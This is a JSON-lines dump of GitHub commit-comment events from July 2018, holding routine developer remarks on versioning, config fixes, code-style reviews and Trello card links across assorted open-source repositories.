{"id":"8015284029","type":"CommitCommentEvent","actor":{"login":"pc494"},"repo":{"name":"pyxem/pyxem"},"payload":{"comment":{"id":29826411,"position":null,"line":null,"path":null,"commit_id":"af717246f3ecc41e2ab7b6c46917f0777e238f8b","created_at":"2018-07-25T09:30:53Z","updated_at":"2018-07-25T09:30:53Z","author_association":"MEMBER","body":"This may end up having to be \"0.5.1\" if this (non-numeric naming) breaks dependency requirements. But I still think not having pyxem claiming to be 0.5 when it's actually bleeding edge code should help resolve some issues."}},"created_at":"2018-07-25T09:30:53Z"}
{"id":"8015284592","type":"CommitCommentEvent","actor":{"login":"grillazz"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29826412,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-25T09:30:59Z","updated_at":"2018-07-25T09:30:59Z","author_association":"NONE","body":"await too"}},"created_at":"2018-07-25T09:30:59Z"}
{"id":"8015284627","type":"CommitCommentEvent","actor":{"login":"protyposis"},"repo":{"name":"bitmovin/bitmovin-analytics-collector"},"payload":{"comment":{"id":29826413,"position":null,"line":null,"path":null,"commit_id":"8cee55aad1dddd30219b3c96cb47f700adcef353","created_at":"2018-07-25T09:31:00Z","updated_at":"2018-07-25T09:31:00Z","author_association":"COLLABORATOR","body":"This commit contains several unrelated changes. You should commit them separately with meaningful messages.\r\n\r\n * Fix type in eventCallback signature\r\n * Improve types in Bitmovin7 adapter\r\n * Rename States enum to State\r\n * Add QualityLevelInfo interface\r\n * ..."}},"created_at":"2018-07-25T09:31:00Z"}
{"id":"8015286412","type":"CommitCommentEvent","actor":{"login":"kamblepragati"},"repo":{"name":"kamblepragati/demon"},"payload":{"comment":{"id":29826416,"position":null,"line":null,"path":null,"commit_id":"ad9267aafc8a0e2b5ffc92f60cc9c5b5d76d2019","created_at":"2018-07-25T09:31:18Z","updated_at":"2018-07-25T09:31:18Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-25T09:31:18Z"}
{"id":"8015288581","type":"CommitCommentEvent","actor":{"login":"ryansmith94"},"repo":{"name":"HT2-Labs/mural"},"payload":{"comment":{"id":29826420,"position":3,"line":3,"path":"src/cards/CardFooter.tsx","commit_id":"e01a359bdd0066f5db16d2e5a2f2b8957a64ca1a","created_at":"2018-07-25T09:31:41Z","updated_at":"2018-07-25T09:31:41Z","author_association":"CONTRIBUTOR","body":"@GooBall make sure there's no blank lines between imports, I think it'll throw off the linter."}},"created_at":"2018-07-25T09:31:41Z"}
{"id":"8015293400","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29826428,"position":null,"line":null,"path":null,"commit_id":"a1e5b5021f6620cc977a8292443143e4611229b2","created_at":"2018-07-25T09:32:35Z","updated_at":"2018-07-25T09:32:35Z","author_association":"CONTRIBUTOR","body":"Pray that it did not destroy your hole as well, and go get a new one."}},"created_at":"2018-07-25T09:32:35Z"}
{"id":"8015294492","type":"CommitCommentEvent","actor":{"login":"dnjohnstone"},"repo":{"name":"pyxem/pyxem"},"payload":{"comment":{"id":29826436,"position":null,"line":null,"path":null,"commit_id":"af717246f3ecc41e2ab7b6c46917f0777e238f8b","created_at":"2018-07-25T09:32:48Z","updated_at":"2018-07-25T09:32:48Z","author_association":"MEMBER","body":"I think I'd prefer 0.5.1 - is there any reason not to go for that?"}},"created_at":"2018-07-25T09:32:48Z"}
{"id":"8015294496","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29826437,"position":null,"line":null,"path":null,"commit_id":"919b7fd5c9c22d66f2e0723b093e67b78f84f8e3","created_at":"2018-07-25T09:32:48Z","updated_at":"2018-07-25T09:32:48Z","author_association":"COLLABORATOR","body":"Converted to c from linear to bmdfilm 1d lut, yes."}},"created_at":"2018-07-25T09:32:48Z"}
{"id":"8015295948","type":"CommitCommentEvent","actor":{"login":"mohamedzayed92"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29826444,"position":4,"line":37,"path":"assembl/views/__init__.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-25T09:33:03Z","updated_at":"2018-07-25T09:33:03Z","author_association":"CONTRIBUTOR","body":"I think it was a mistake, I took it off"}},"created_at":"2018-07-25T09:33:03Z"}
{"id":"8015297972","type":"CommitCommentEvent","actor":{"login":"davidbriand-cea"},"repo":{"name":"CEA-LIST/N2D2"},"payload":{"comment":{"id":29826451,"position":null,"line":null,"path":null,"commit_id":"9322c73e32a3e52adc704941e2476a8f71668cbe","created_at":"2018-07-25T09:33:24Z","updated_at":"2018-07-25T09:33:24Z","author_association":"CONTRIBUTOR","body":"Hi, thanks for the information.\r\nI think there is a problem in the pre-processing description of your initalization file.\r\nYou rescale input image to 142x37x1 dimension but the stimuli provider (sp) is expected a pre-processsed image to 124x37x1.\r\n\r\nCan you try with this :\r\nDefaultModel=Frame\r\n[database]\r\nType=DIR_Database\r\nDataPath=/nobackup/N2D2/data/tracking_kitti/training/image_02\r\nDepth=1\r\nLearn=0.8\r\nValidation=0.2\r\n\r\n[sp]\r\nSizeX=124\r\nSizeY=37\r\nBatchSize=1\r\n\r\n[sp.Transformation1]\r\nType=RescaleTransformation\r\nWidth=[sp]SizeX\r\nHeight=[sp]SizeY\r\n\r\n[sp.Transformation2]\r\nType=ChannelExtractionTransformation\r\nCSChannel=Gray``\r\n\r\nLet me know if it resolve your problem."}},"created_at":"2018-07-25T09:33:24Z"}
{"id":"8015301932","type":"CommitCommentEvent","actor":{"login":"strogonoff"},"repo":{"name":"riboseinc/asciidoctor-iso"},"payload":{"comment":{"id":29826463,"position":null,"line":null,"path":null,"commit_id":"f44cea712bd30f0036c13f15038d625c12a7dc40","created_at":"2018-07-25T09:34:07Z","updated_at":"2018-07-25T09:34:07Z","author_association":"NONE","body":"No need, I’m working on this stuff in my forks for now! I’ll make a merge request today/tomorrow and we’ll review it. Could be a merge mess if you do it at the same time😂\n\n> On 25 Jul 2018, at 12:15 PM, Nick Nicholas <notifications@github.com> wrote:\n> \n> So, @strogonoff, would you like me to move all my READMEs to docs/README?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-25T09:34:07Z"}
{"id":"8015302428","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29826464,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T09:34:12Z","updated_at":"2018-07-25T09:34:12Z","author_association":"OWNER","body":"@joergoster Well, in this case, me neither, but I wish to have the problem fixed in master, and if your solution works better, I'd go for it."}},"created_at":"2018-07-25T09:34:12Z"}
{"id":"8015307152","type":"CommitCommentEvent","actor":{"login":"meta-rahul-mittal"},"repo":{"name":"meta-vaibhav-gautam/GET2018_Assignments"},"payload":{"comment":{"id":29826468,"position":4,"line":4,"path":"Assignments/SCF_Session-5/SCF_Session-5_Q1/HCF.java","commit_id":"54d380571cc0ac6517497ee8bbd201b1379b4549","created_at":"2018-07-25T09:35:05Z","updated_at":"2018-07-25T09:35:05Z","author_association":"COLLABORATOR","body":"@meta-vaibhav-gautam  Class name should be in proper way. Class name should not be in abbreviation form. "}},"created_at":"2018-07-25T09:35:05Z"}
{"id":"8015316918","type":"CommitCommentEvent","actor":{"login":"nandubatchu"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29826481,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-25T09:36:55Z","updated_at":"2018-07-25T09:36:55Z","author_association":"NONE","body":"How can we use these custom key-value pairs inside the hooks code?"}},"created_at":"2018-07-25T09:36:55Z"}
{"id":"8015317454","type":"CommitCommentEvent","actor":{"login":"aonez"},"repo":{"name":"aonez/Keka"},"payload":{"comment":{"id":29826483,"position":null,"line":null,"path":null,"commit_id":"061d6eb066465c2b3436598cf964c6fdbea5a12a","created_at":"2018-07-25T09:37:01Z","updated_at":"2018-07-25T09:37:01Z","author_association":"OWNER","body":"In case you can/want to translate those and what's not translated yet, for 1.1.3 version 🤓 1.1.2 version will be released very soon (if Apple allows it), not translated.\r\n\r\n@a-tokarev @maxsky @wangcheng678 @lboratynski @vitu @jihoongks @deyanm @thomassth @jrthsr700tmax"}},"created_at":"2018-07-25T09:37:01Z"}
{"id":"8015326700","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29826504,"position":null,"line":null,"path":null,"commit_id":"9989c8179d9be367bdcad691cbae963f792d35f0","created_at":"2018-07-25T09:38:46Z","updated_at":"2018-07-25T09:38:46Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/translations-in-the-design/93052/6\n"}},"created_at":"2018-07-25T09:38:46Z"}
{"id":"8015333130","type":"CommitCommentEvent","actor":{"login":"MaxenceBouvier"},"repo":{"name":"CEA-LIST/N2D2"},"payload":{"comment":{"id":29826508,"position":null,"line":null,"path":null,"commit_id":"9322c73e32a3e52adc704941e2476a8f71668cbe","created_at":"2018-07-25T09:39:57Z","updated_at":"2018-07-25T09:39:57Z","author_association":"NONE","body":"Yes indeed it did solve my problem, thanks !"}},"created_at":"2018-07-25T09:39:57Z"}
{"id":"8015343670","type":"CommitCommentEvent","actor":{"login":"rainede"},"repo":{"name":"rainede/website-template-cv"},"payload":{"comment":{"id":29826527,"position":null,"line":null,"path":null,"commit_id":"dfbe06833313a668250235aae497d8ebd5ec0438","created_at":"2018-07-25T09:41:55Z","updated_at":"2018-07-25T09:41:55Z","author_association":"OWNER","body":"sourced from https://www.w3schools.com/w3css/4/w3.css"}},"created_at":"2018-07-25T09:41:55Z"}
{"id":"8015345883","type":"CommitCommentEvent","actor":{"login":"hellochueng"},"repo":{"name":"lrwinx/shop"},"payload":{"comment":{"id":29826530,"position":28,"line":65,"path":"api-gateway/pom.xml","commit_id":"3f2a47fcd17946695e79a2625a865a6dbfd4c389","created_at":"2018-07-25T09:42:20Z","updated_at":"2018-07-25T09:42:20Z","author_association":"NONE","body":"顶顶顶顶"}},"created_at":"2018-07-25T09:42:20Z"}
{"id":"8015347509","type":"CommitCommentEvent","actor":{"login":"hellochueng"},"repo":{"name":"lrwinx/shop"},"payload":{"comment":{"id":29826534,"position":6,"line":43,"path":"api-gateway/pom.xml","commit_id":"3f2a47fcd17946695e79a2625a865a6dbfd4c389","created_at":"2018-07-25T09:42:38Z","updated_at":"2018-07-25T09:42:38Z","author_association":"NONE","body":"的点点滴滴"}},"created_at":"2018-07-25T09:42:38Z"}
{"id":"8015350017","type":"CommitCommentEvent","actor":{"login":"SpajicM"},"repo":{"name":"rushisangani/RSSelectionMenu"},"payload":{"comment":{"id":29826538,"position":null,"line":null,"path":null,"commit_id":"eb2d40b406014f7ee3e4a7517c42c82d13c677d9","created_at":"2018-07-25T09:43:08Z","updated_at":"2018-07-25T09:43:08Z","author_association":"NONE","body":"Perfect timing! Just found this library 3 days ago, and, since all my models were codable, I was using for loop hacks to get strings and return it.\r\n\r\nNow I visit again, and see this! Thanks!"}},"created_at":"2018-07-25T09:43:08Z"}
{"id":"8015355098","type":"CommitCommentEvent","actor":{"login":"f-f"},"repo":{"name":"dhall-lang/dhall-lang"},"payload":{"comment":{"id":29826542,"position":54,"line":3884,"path":"standard/semantics.md","commit_id":"0f7e33c13e34a6392956ba0d0983dec568feb129","created_at":"2018-07-25T09:44:02Z","updated_at":"2018-07-25T09:44:02Z","author_association":"MEMBER","body":"Sorry if the question has been asked already: does this mean that every time we have a new protocol version (this includes every time we have a new feature in the language) all the hashes change and we have to recompute them? (assuming you always want to encode them with the latest version available)"}},"created_at":"2018-07-25T09:44:02Z"}
{"id":"8015362159","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826556,"position":null,"line":null,"path":null,"commit_id":"c1e12e4df2ee7b27e21a7d3407d57401410f34ef","created_at":"2018-07-25T09:45:23Z","updated_at":"2018-07-25T09:45:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredArrears View](https://trello.com/c/msIiEofo/83-filteredarrears-view)"}},"created_at":"2018-07-25T09:45:23Z"}
{"id":"8015364324","type":"CommitCommentEvent","actor":{"login":"pc494"},"repo":{"name":"pyxem/pyxem"},"payload":{"comment":{"id":29826560,"position":null,"line":null,"path":null,"commit_id":"af717246f3ecc41e2ab7b6c46917f0777e238f8b","created_at":"2018-07-25T09:45:46Z","updated_at":"2018-07-25T09:45:46Z","author_association":"MEMBER","body":"0.5.1 won't always stay the same. Which seems in conflict with the spirit of versioning.\r\n\r\nHowever, I was wrong about this, as rule 4 of Semantic Versioning is:\r\n_Major version zero (0.y.z) is for initial development. Anything may change at any time. The public API should not be considered stable._\r\n\r\nSo we'll just call everything between releases 0.X.1 and they can vanish when we upgrade them to \r\n0.(X+1) ~ will fix this now."}},"created_at":"2018-07-25T09:45:46Z"}
{"id":"8015366819","type":"CommitCommentEvent","actor":{"login":"fredrikeverts"},"repo":{"name":"fredrikeverts/Academind"},"payload":{"comment":{"id":29826562,"position":null,"line":null,"path":null,"commit_id":"5474304a5e12e563831218499d00bc55ca17515e","created_at":"2018-07-25T09:46:15Z","updated_at":"2018-07-25T09:46:15Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-25T09:46:15Z"}
{"id":"8015367995","type":"CommitCommentEvent","actor":{"login":"mondalaci"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":29826564,"position":null,"line":null,"path":null,"commit_id":"b8859f7b64ced37737048cad7293519c0db21d92","created_at":"2018-07-25T09:46:28Z","updated_at":"2018-07-25T09:46:28Z","author_association":"MEMBER","body":"Totally failed to notice them. Just made a commit to get rid of this redundancy."}},"created_at":"2018-07-25T09:46:28Z"}
{"id":"8015368939","type":"CommitCommentEvent","actor":{"login":"harvey637"},"repo":{"name":"jp112sdl/JP-HB-Devices-addon"},"payload":{"comment":{"id":29826565,"position":null,"line":null,"path":null,"commit_id":"af3cfb82b22fe7d4a891e639ababea92515914de","created_at":"2018-07-25T09:46:40Z","updated_at":"2018-07-25T09:46:40Z","author_association":"NONE","body":"Hi,\r\nhmmmmmm, the word \"DeviceID\" is used e.g. in asksinpp/Device.h for the 3 byte hex code that\r\nidentifies a unique hardware.\r\n\r\nMay be a better name for this is \"DeviceType\", <type .... /type> is the structure inside the device.xml.\r\nOr \"DeviceModel\", as this is the name used inseide asksinpp/Device.h\r\n\r\njust my opinion, appreciate your work very much!\r\n "}},"created_at":"2018-07-25T09:46:40Z"}
{"id":"8015377912","type":"CommitCommentEvent","actor":{"login":"meta-rahul-mittal"},"repo":{"name":"meta-vaibhav-gautam/GET2018_Assignments"},"payload":{"comment":{"id":29826585,"position":6,"line":6,"path":"Assignments/SCF_Session-5/SCF_Session-5_Q1/HCFTest.java","commit_id":"54d380571cc0ac6517497ee8bbd201b1379b4549","created_at":"2018-07-25T09:48:18Z","updated_at":"2018-07-25T09:48:18Z","author_association":"COLLABORATOR","body":"@meta-vaibhav-gautam Comments should be proper in test classes too."}},"created_at":"2018-07-25T09:48:18Z"}
{"id":"8015382411","type":"CommitCommentEvent","actor":{"login":"tomchristie"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29826590,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-25T09:49:09Z","updated_at":"2018-07-25T09:49:09Z","author_association":"MEMBER","body":"Please don't do that, it doesn't add anything constructive.\r\n\r\nIt'll come."}},"created_at":"2018-07-25T09:49:09Z"}
{"id":"8015386084","type":"CommitCommentEvent","actor":{"login":"sderosiaux"},"repo":{"name":"sderosiaux/every-single-day-i-tldr"},"payload":{"comment":{"id":29826596,"position":null,"line":null,"path":null,"commit_id":"9f620cdb7ad3846c9ad24678bf7a673078667473","created_at":"2018-07-25T09:49:50Z","updated_at":"2018-07-25T09:49:50Z","author_association":"OWNER","body":"It's been a while! ;-)"}},"created_at":"2018-07-25T09:49:50Z"}
{"id":"8015387131","type":"CommitCommentEvent","actor":{"login":"Wesley-VanNeck"},"repo":{"name":"magicus/ProtocolSupport"},"payload":{"comment":{"id":29826597,"position":null,"line":null,"path":null,"commit_id":"e7c7ca51474308df4c7b3d6d8601936f86ebd098","created_at":"2018-07-25T09:50:02Z","updated_at":"2018-07-25T09:50:02Z","author_association":"NONE","body":"@magicus why remove it"}},"created_at":"2018-07-25T09:50:02Z"}
{"id":"8015391177","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29826601,"position":null,"line":null,"path":null,"commit_id":"565fd7f612e66076c7d1f7257520bea3999a7b25","created_at":"2018-07-25T09:50:47Z","updated_at":"2018-07-25T09:50:47Z","author_association":"CONTRIBUTOR","body":"Sweeeeeeeeeeeeet :heart: "}},"created_at":"2018-07-25T09:50:47Z"}
{"id":"8015398186","type":"CommitCommentEvent","actor":{"login":"meijeru"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29826610,"position":null,"line":null,"path":null,"commit_id":"481625f68ed25fecd5c172f568690e50693553db","created_at":"2018-07-25T09:52:02Z","updated_at":"2018-07-25T09:52:02Z","author_association":"NONE","body":"Why not use the symbolic constant???"}},"created_at":"2018-07-25T09:52:02Z"}
{"id":"8015398372","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"UT-TeX/ut-tex.github.io"},"payload":{"comment":{"id":29826612,"position":null,"line":null,"path":null,"commit_id":"2640a73fd1bb0d2c633d836b191f5363bf4979d1","created_at":"2018-07-25T09:52:04Z","updated_at":"2018-07-25T09:52:04Z","author_association":"MEMBER","body":"@puripuri2100 こんにちは。東大TeX愛好会の@Yasunari15と申します。Rayからお話は良く伺っています。現在，我々のHomepageもGitHub Pagesを活用して移行に向けて進んでいる所です。Twitterで紹介して下さっているのを拝見して，Memberとしてご招待したいと思いました。実際の活動につきましては，[Activities](https://ut-tex.github.io/activities/)をご覧ください。お返事，お待ちしています。"}},"created_at":"2018-07-25T09:52:04Z"}
{"id":"8015404901","type":"CommitCommentEvent","actor":{"login":"EngineerHamse"},"repo":{"name":"EngineerHamse/HAWMASYTEAM"},"payload":{"comment":{"id":29826624,"position":null,"line":null,"path":null,"commit_id":"8ae346adff5e3aa83c7d40e3630192584276c78c","created_at":"2018-07-25T09:53:13Z","updated_at":"2018-07-25T09:53:13Z","author_association":"OWNER","body":"hello wrold"}},"created_at":"2018-07-25T09:53:13Z"}
{"id":"8015412302","type":"CommitCommentEvent","actor":{"login":"derrickmehaffy"},"repo":{"name":"DarkWanderer/CAPIv2-Strapi"},"payload":{"comment":{"id":29826635,"position":11,"line":17,"path":".travis.yml","commit_id":"1ec605528a1abbad494f3145afa269cdd2d4ef9a","created_at":"2018-07-25T09:54:37Z","updated_at":"2018-07-25T09:54:37Z","author_association":"NONE","body":"No need for this as your on npm 10"}},"created_at":"2018-07-25T09:54:37Z"}
{"id":"8015422586","type":"CommitCommentEvent","actor":{"login":"grillazz"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29826657,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-25T09:56:31Z","updated_at":"2018-07-25T09:56:31Z","author_association":"NONE","body":"@tomchristie it wasn't my intention.\r\nI'm python developer. If I can help with this please let me know.\r\n"}},"created_at":"2018-07-25T09:56:31Z"}
{"id":"8015423652","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826658,"position":null,"line":null,"path":null,"commit_id":"9a33844cc2b94423b0f97c61ea1896127bf2dcfe","created_at":"2018-07-25T09:56:44Z","updated_at":"2018-07-25T09:56:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredConsumerChargeSetup](https://trello.com/c/XW6nso5E/86-filteredconsumerchargesetup)"}},"created_at":"2018-07-25T09:56:44Z"}
{"id":"8015423908","type":"CommitCommentEvent","actor":{"login":"916552375"},"repo":{"name":"916552375/Nikolas"},"payload":{"comment":{"id":29826660,"position":5,"line":10,"path":"practice/src/LittleSun.java","commit_id":"aa460cf83a67872ad997a3efca49846de75b4b2c","created_at":"2018-07-25T09:56:46Z","updated_at":"2018-07-25T09:56:46Z","author_association":"OWNER","body":"校正单词"}},"created_at":"2018-07-25T09:56:46Z"}
{"id":"8015425054","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826663,"position":null,"line":null,"path":null,"commit_id":"1b443d92909a23435b2d714c6d6fb4ed30dcad88","created_at":"2018-07-25T09:56:59Z","updated_at":"2018-07-25T09:56:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredInterest](https://trello.com/c/syn2F3bo/89-filteredinterest)"}},"created_at":"2018-07-25T09:56:59Z"}
{"id":"8015426683","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826665,"position":null,"line":null,"path":null,"commit_id":"f13aa3706946b095954be477e66109c5610223bd","created_at":"2018-07-25T09:57:17Z","updated_at":"2018-07-25T09:57:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredDiscount](https://trello.com/c/dJBagcxz/87-filtereddiscount)"}},"created_at":"2018-07-25T09:57:17Z"}
{"id":"8015427991","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826673,"position":null,"line":null,"path":null,"commit_id":"8f69ab764dda97759a4e48c805a4b27a997d4925","created_at":"2018-07-25T09:57:32Z","updated_at":"2018-07-25T09:57:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredFixedCharge](https://trello.com/c/BDux04i7/88-filteredfixedcharge)"}},"created_at":"2018-07-25T09:57:32Z"}
{"id":"8015429323","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826679,"position":null,"line":null,"path":null,"commit_id":"267206c993b0ea47dd28506a2927e2772773473e","created_at":"2018-07-25T09:57:47Z","updated_at":"2018-07-25T09:57:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredLevy](https://trello.com/c/zgIfwLbb/90-filteredlevy)"}},"created_at":"2018-07-25T09:57:47Z"}
{"id":"8015429614","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29826681,"position":5,"line":1699,"path":"src/geometry/contour.js","commit_id":"8ba7581b0e49436f7ff97bef3fe2f2ccd2497af4","created_at":"2018-07-25T09:57:50Z","updated_at":"2018-07-25T09:57:50Z","author_association":"CONTRIBUTOR","body":"Евгений, ошибка.\r\n`- let angle = curr.e.subtract(curr.b).round(1);`\r\n`+ let angle = curr.e.subtract(curr.b).angle.round(1);`"}},"created_at":"2018-07-25T09:57:50Z"}
{"id":"8015429727","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29826682,"position":29,"line":156,"path":"contracts/NextyBonus.sol","commit_id":"09285274167d6a3f03d0cf36390e13cdf5e40073","created_at":"2018-07-25T09:57:51Z","updated_at":"2018-07-25T09:57:51Z","author_association":"COLLABORATOR","body":"added 2 functions to getHistoy for fixed- and bonusAmounts"}},"created_at":"2018-07-25T09:57:51Z"}
{"id":"8015431048","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826685,"position":null,"line":null,"path":null,"commit_id":"267206c993b0ea47dd28506a2927e2772773473e","created_at":"2018-07-25T09:58:06Z","updated_at":"2018-07-25T09:58:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredLocationCharge](https://trello.com/c/yeDMKr8O/91-filteredlocationcharge)"}},"created_at":"2018-07-25T09:58:06Z"}
{"id":"8015433240","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826691,"position":null,"line":null,"path":null,"commit_id":"120cabaab0f1e284a13f5bed7ecd7d7f480e2755","created_at":"2018-07-25T09:58:31Z","updated_at":"2018-07-25T09:58:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredPocChargeHistory](https://trello.com/c/6HYpjIhL/92-filteredpocchargehistory)"}},"created_at":"2018-07-25T09:58:31Z"}
{"id":"8015435030","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826695,"position":null,"line":null,"path":null,"commit_id":"1570165b2f345377ef8bab30641511fc4fe8fec3","created_at":"2018-07-25T09:58:50Z","updated_at":"2018-07-25T09:58:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredPocChargeSetup](https://trello.com/c/5BLpRzj5/93-filteredpocchargesetup)"}},"created_at":"2018-07-25T09:58:50Z"}
{"id":"8015435247","type":"CommitCommentEvent","actor":{"login":"Alexell"},"repo":{"name":"phpservermon/phpservermon"},"payload":{"comment":{"id":29826696,"position":null,"line":null,"path":null,"commit_id":"c2eeadc844352d77324a0327f320cb8d61e02ba2","created_at":"2018-07-25T09:58:52Z","updated_at":"2018-07-25T09:58:52Z","author_association":"CONTRIBUTOR","body":"Why?\r\nNow in the array there were **duplicate lines** of `telegram` and `telegram_description`"}},"created_at":"2018-07-25T09:58:52Z"}
{"id":"8015435857","type":"CommitCommentEvent","actor":{"login":"mohamedebrahim96"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29826698,"position":null,"line":null,"path":null,"commit_id":"afc81c1855bf711315b8e5de02db138d3d487eeb","created_at":"2018-07-25T09:58:59Z","updated_at":"2018-07-25T09:58:59Z","author_association":"NONE","body":"HBD swift and i hope apple use Android "}},"created_at":"2018-07-25T09:58:59Z"}
{"id":"8015436615","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"jfcherng/phpmyadmin"},"payload":{"comment":{"id":29826701,"position":null,"line":null,"path":null,"commit_id":"8b8e4e96b475088beda26ab6a2aa2baaaf85d0ba","created_at":"2018-07-25T09:59:09Z","updated_at":"2018-07-25T09:59:09Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-25T09:59:09Z"}
{"id":"8015437031","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826703,"position":null,"line":null,"path":null,"commit_id":"7a8ada2cc028bd9d3987921e93d9bad629e3b155","created_at":"2018-07-25T09:59:14Z","updated_at":"2018-07-25T09:59:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredTariff](https://trello.com/c/UCUtKSOx/94-filteredtariff)"}},"created_at":"2018-07-25T09:59:14Z"}
{"id":"8015437706","type":"CommitCommentEvent","actor":{"login":"jp112sdl"},"repo":{"name":"jp112sdl/JP-HB-Devices-addon"},"payload":{"comment":{"id":29826705,"position":null,"line":null,"path":null,"commit_id":"af3cfb82b22fe7d4a891e639ababea92515914de","created_at":"2018-07-25T09:59:21Z","updated_at":"2018-07-25T09:59:21Z","author_association":"OWNER","body":"Yes, it would be better. \r\nIt's changed with 3481bba"}},"created_at":"2018-07-25T09:59:21Z"}
{"id":"8015438286","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826706,"position":null,"line":null,"path":null,"commit_id":"0d42c3cf75b10bfcadd879705fc7f5e0ef64ac5d","created_at":"2018-07-25T09:59:28Z","updated_at":"2018-07-25T09:59:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredTax](https://trello.com/c/WAYMY51e/95-filteredtax)"}},"created_at":"2018-07-25T09:59:28Z"}
{"id":"8015438467","type":"CommitCommentEvent","actor":{"login":"samohovets"},"repo":{"name":"exoframejs/exoframe"},"payload":{"comment":{"id":29826707,"position":null,"line":null,"path":null,"commit_id":"c346f9d504d3ab64bb85333dafc69e4ad2d43dd9","created_at":"2018-07-25T09:59:30Z","updated_at":"2018-07-25T09:59:30Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-25T09:59:30Z"}
